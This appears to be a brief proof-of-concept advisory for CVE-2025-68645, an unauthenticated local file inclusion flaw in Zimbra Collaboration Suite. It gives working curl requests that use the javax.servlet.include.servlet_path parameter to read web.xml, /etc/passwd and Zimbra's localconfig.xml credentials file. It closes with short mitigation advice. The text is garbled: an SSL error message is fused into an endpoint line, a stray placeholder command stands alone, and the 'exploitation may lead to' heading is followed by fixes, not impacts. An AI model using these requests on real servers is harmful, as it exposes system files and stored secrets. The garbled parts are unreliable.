
CVE-2025-68645
This document describes a Local File Inclusion (LFI) vulnerability affecting Zimbra Collaboration Suite.
The issue arises from improper handling of the following parameter:
/h/*?javax.servlet.include.servlet_path=
This allows an unauthenticated user to access internal application resources.
Test request:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
Multiple endpoints process the vulnerable parameter differently.
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/restSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
Successful exploitation may lead to:
Update Zimbra to patched versions
Restrict access to vulnerable endpoints
Monitor logs for suspicious parameters:
javax.servlet.include.servlet_pathDeploy WAF rules to block malicious patterns